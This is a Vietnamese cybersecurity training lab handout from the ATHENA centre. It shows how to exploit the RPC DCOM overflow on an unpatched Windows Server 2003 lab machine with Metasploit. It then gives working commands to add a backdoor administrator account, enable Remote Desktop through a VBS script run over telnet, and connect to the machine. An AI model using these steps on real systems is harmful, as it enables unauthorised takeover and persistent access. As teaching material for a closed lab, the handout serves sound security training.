Athena Lab it
-
Upload
khuc-anh-minh-luong -
Category
Documents
-
view
83 -
download
5
Transcript of Athena Lab it
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 1
Lab : Ứng dụng Metasploit Attack để khai thác các lỗ
hổng trên mạng
1. Chúng ta, người dùng thường ít ai quan tâm đến việc update cho máy của mình
hoặc không update vì sợ update sẽ làm máy ngày càng chậm chạp. Nhưng đối
với các hệ điều hành thì thường phát sinh các lỗi, HĐH bị lỗi không được
update các bản vá và đây chính là cơ hội cho hacker có thể thâm nhập chiếm
quyền hệ thống máy người dùng.
2. Như vậy việc update các bản vá trở nên hết sức quan trọng đối với người dùng. Bài
lab dưới đây sẽ giới thiệu một các đơn giản mà hacker có thẻ lợi dụng để tấn công
vào các máy chưa được cập nhật bản vá
Mô hình :
Mô hình ở đây gồm 2 máy trong cùng một mạng
+ Máy attacker : . Computer Name: DC1
. IP : 10.19.139.180
. OS: Windows Server 2003
+ Máy Victim : . Computer Name: DC2
. IP : 10.19.139.181
. OS: Windows Server 2003 SP1 chưa update bản vá
Tool sử dụng: Metasploit 3
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 2
Mục đích: Chiếm quền Administrator và Remote Desktop qua máy DC2
Thực hiện:
- Download tool Metaslpoit về : http://www.metasploit.com/framework/download/
- Tiến hành cài đặt Metasploit trên DC1
- Sau khi tiến trình cài đặt hoàn tất bạn chạy Metasploit GUI
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 3
- Do máy DC2 chưa được update bản vá nên ta sẽ chọn bug : Microsoft RPC DCOM
Interface Overflow để khai thác .
- chọn Exploit Windows dcerpc . Và ta sẽ chọn bug : Microsoft RPC DCOM Interface
Overflow .
- Right click –> chọn Excute
- Chọn OS của Target(DC2) và chọn forward
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 4
- Tiếp theo chọn shell để chèn vào máy victim . Ta chọn
windows/shell/shell_blind_tcp rồi bấm forward.
- Bước tiếp theo ta nhập ip của target vào :
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 5
- Sau đó bạn chọn apply ở bước tiếp theo
- Sau khi apply thành công thì ta đã chèn thành công shell vào máy victim và tạo
session kết nối đến máy Victim(DC2).
- Tiếp theo ta chọn “Interact Session” để thực hiện việc tương tác đến máy victim và
chiếm quyền hệ thống của máy DC2
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 6
- Việc kết nối shell trên máy victim đã hoàn tất
- Như vậy chúng ta đã ở trong shell trên máy victim với permission Administrator. Tiếp
theo chúng ta sẽ tạo 1 user và add user đó vào group Administrators:
C:\WINDOWS\system32>net user luongkhiem 123 /add
C:\WINDOWS\system32>net localgroup administrators luongkhiem /add
- Chúng ta đã chiếm thành công quyền hệ thống của máy DC2 và nhiệm vụ tiếp theo
là Remote Desktop và máy DC2. Đầu tiên ta kiểm tra coi máy victim có mở remote
desktop hay không bằng cách dùng lệnh netstat
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 7
- Như vậy là máy victim ko có mở port 3339 . như vậy ta cần phải tìm cách open port
này .
- Trước tiên cần coi máy đang chạy những dịch vụ vào
C:\WINDOWS\system32>net start
These Windows services are started:
Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DHCP Client
Distributed File System
Distributed Link Tracking Client
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 8
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
Internet Connection Firewall (ICF) / Internet Connect
IPSEC Services
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 9
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Telnet
Terminal Services
VMware Tools Service
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
The command completed successfully.
- Như vậy là máy victim có chạy telnet ! ta telnet vào máy victim và mở port 3389
bằng đường telnet
C:\> telnet 10.19.139.181
*==================================================
=============
Welcome to Microsoft Telnet Server.
*==================================================
=============
C:\>ipconfig
Windows IP Configuration
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 10
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.19.139.181
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . : 10.19.128.1
C:\>copy con remote.vbs
machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on
set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 11
next^Z
1 file(s) copied.
C:\>dir
Volume in drive C has no label.
Volume Serial Number is C022-B43C
Directory of C:\
12/19/2008 10:36 PM 0 AUTOEXEC.BAT
12/19/2008 10:36 PM 0 CONFIG.SYS
12/28/2008 01:29 PM <DIR> Documents and Settings
12/27/2008 10:14 PM 0 lk.vbs
12/27/2008 10:32 PM 0 net
12/21/2008 09:48 PM <DIR> Program Files
12/28/2008 01:29 PM 321 remote.vbs
12/27/2008 07:40 PM <DIR> WINDOWS
12/19/2008 10:37 PM <DIR> wmpub
5 File(s) 321 bytes
4 Dir(s) 105,423,151,104 bytes free
C:\>remote.vbs
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 12
C:\>netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:23 0.0.0.0:0 LISTENING 1140
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752
TCP 10.19.139.181:23 10.19.139.180:3027 ESTABLISHED 1140
TCP 10.19.139.181:139 0.0.0.0:0 LISTENING 4
TCP 10.19.139.181:445 10.19.139.180:3024 ESTABLISHED 4
TCP 10.19.139.181:4444 10.19.139.180:3020 ESTABLISHED 700
TCP 127.0.0.1:3001 0.0.0.0:0 LISTENING 1272
TCP 127.0.0.1:3002 0.0.0.0:0 LISTENING 968
TCP 127.0.0.1:3003 0.0.0.0:0 LISTENING 968
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 528
UDP 0.0.0.0:1027 *:* 908
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 13
UDP 0.0.0.0:3005 *:* 968
UDP 0.0.0.0:4500 *:* 528
UDP 10.19.139.181:123 *:* 968
UDP 10.19.139.181:137 *:* 4
UDP 10.19.139.181:138 *:* 4
UDP 127.0.0.1:123 *:* 968
- Như vậy chúng ta đã mở được port 3389
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752
- Remote Desktop vào máy DC2
C:\>mstsc
Như vậy là chúng ta đã remote desktop được máy victim . Từ đây có thể khai thác các
thông tin từ máy Victim. Đây là một lổ hổng nghiêm trọng .
Các bạn học viên cần lưu ý để biết cách fix các lổ hổng tương tự
Chúc các bạn thành công .
www.athena.edu.vn
Tài liệu thực hành Lab – Trung tâm đào tạo an ninh mạng ATHENA . www.athena.edu.vn 14